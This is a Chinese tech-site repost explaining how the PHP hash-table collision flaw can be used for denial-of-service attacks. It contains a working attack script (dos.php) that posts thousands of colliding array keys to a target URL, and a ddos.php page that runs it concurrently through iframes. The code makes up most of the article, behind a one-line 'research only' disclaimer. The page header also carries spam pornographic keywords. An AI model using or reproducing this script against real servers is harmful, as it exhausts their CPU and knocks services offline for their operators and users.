亚洲九九黑人视频,激情综合色综合久久综合,久久久久亚洲Av片无码

當(dāng)前位置：首頁(yè) > 范文|應(yīng)用文 > IT技術(shù)專欄 > 網(wǎng)絡(luò)編程

PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析

來(lái)源：易賢網(wǎng) 閱讀：1072 次日期：2015-03-30 11:44:48

溫馨提示：易賢網(wǎng)小編為您整理了“PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析”,方便廣大網(wǎng)友查閱！

這篇文章主要介紹了PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法,實(shí)例分析了php利用hash進(jìn)行DDoS攻擊的原理與實(shí)現(xiàn)技巧,需要的朋友可以參考下

本文實(shí)例分析了PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法。分享給大家供大家參考。具體分析如下：

首先聲明：本文內(nèi)容只用于研究學(xué)習(xí)使用，請(qǐng)勿用于非法行為！

前面提到過(guò)最近爆出的hash表碰撞漏洞，包括java、python、php等在內(nèi)的很多常用語(yǔ)言均未幸免，今晚咱就來(lái)實(shí)際看看它的威力。

攻擊原理：

通過(guò)向目標(biāo)服務(wù)器post一組精心拼湊的數(shù)組參數(shù)，到達(dá)服務(wù)端后語(yǔ)言底層處理接收到的數(shù)組參數(shù)時(shí)，由于該漏洞的存在造成CPU的大量消耗，最終導(dǎo)致服務(wù)器資源耗盡。

不用什么花哨的手法，就用PHP簡(jiǎn)單實(shí)現(xiàn)下看下效果，點(diǎn)到即止。

文件：dos.php

// 目標(biāo)地址

// 只要目標(biāo)地址存在，不用管它是干嘛的

$host = 'http://127.0.0.1/test.php';

$data = '';

$size = pow(2, 15);

for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)

{

$data .= '&array[' . $key . ']=0';

}

$ret = curl($host, ltrim($data,'&'));

var_dump($ret);

function curl($url, $post, $timeout = 30){

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

$output = curl_exec($ch);

if ($output === false) return false;

$info = curl_getinfo($ch);

$http_code = $info['http_code'];

if ($http_code == 404) return false;

curl_close($ch);

return $output;

}

文件：ddos.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<head>

</head>

<body>

<?php

for($i=0; $i<5; $i++){//并發(fā)數(shù)

echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';

}

</body>

</html>

希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。

更多信息請(qǐng)查看IT技術(shù)專欄

更多信息請(qǐng)查看網(wǎng)絡(luò)編程

上一篇：php實(shí)現(xiàn)插入數(shù)組但不影響原有順序的方法

下一篇：PHP中實(shí)現(xiàn)crontab代碼分享

易賢網(wǎng)手機(jī)網(wǎng)站地址：PHP利用hash沖突漏洞進(jìn)行DDoS攻擊的方法分析

由于各方面情況的不斷調(diào)整與變化，易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考，敬請(qǐng)考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)！

相關(guān)閱讀網(wǎng)絡(luò)編程

Shell中如何刪除文本比較長(zhǎng)的行的實(shí)現(xiàn)方法10月30日

vue.js語(yǔ)法及常用指令10月30日

python 讀寫中文json的實(shí)例詳解10月30日

Objective-C Json 實(shí)例詳解10月30日

bootstrap table sum總數(shù)量統(tǒng)計(jì)實(shí)現(xiàn)方法10月30日

python生成二維碼的實(shí)例詳解10月30日

Python批量更改文件名的實(shí)現(xiàn)方法10月30日

解決出現(xiàn)Incorrect integer value的問(wèn)題10月30日

jQuery實(shí)現(xiàn)切換隱藏與顯示同時(shí)切換圖標(biāo)功能10月30日

docker python api 安裝配置的詳解10月30日

javascript按鈕禁用和啟用的效果實(shí)例代碼10月30日

vue.js todolist實(shí)現(xiàn)代碼10月30日

vue.js 父向子組件傳參的實(shí)例代碼10月30日

apache 開啟重定向 rewrite的實(shí)現(xiàn)方法10月30日

Vue.js劃分組件的方法10月30日

python logging日志模塊的詳解10月30日

vue中的scope使用詳解10月30日

docker cgroup 資源監(jiān)控的詳解10月30日

使用Android Studio 開發(fā)自己的SDK教程10月23日

linux系統(tǒng)下MongoDB單節(jié)點(diǎn)安裝教程10月23日

易賢網(wǎng)移動(dòng)網(wǎng)站

2025國(guó)考·省考課程試聽報(bào)名

報(bào)班類型
姓名
手機(jī)號(hào)
驗(yàn)證碼